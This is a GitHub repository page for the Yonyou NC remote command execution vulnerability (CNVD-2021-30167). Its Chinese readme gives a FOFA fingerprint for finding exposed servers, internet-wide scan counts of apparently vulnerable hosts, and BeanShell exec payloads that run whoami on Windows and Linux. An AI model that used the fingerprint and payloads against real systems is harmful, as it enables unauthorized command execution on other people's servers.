Skip to content

Latest commit

 

History

History
 
 

用友NC远程命令执行漏洞(CNVD-2021-30167)

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
YonYouNC-vuln-scan.py
YonYouNC-vuln-scan.py
 
 
readme.md
readme.md
 
 

readme.md

1、FOFA搜索关键字:

icon_hash="1085941792"

2、检测结果

经检测,互联网上开放目标共6845个,疑似存在漏洞目标1475个,访问异常目标5370个

3、漏洞利用

exec("cmd /c whoami.exe")
exec("/bin/sh whoami")

3、参考连接

https://github.com/z1un/NC-BeanShell-RCE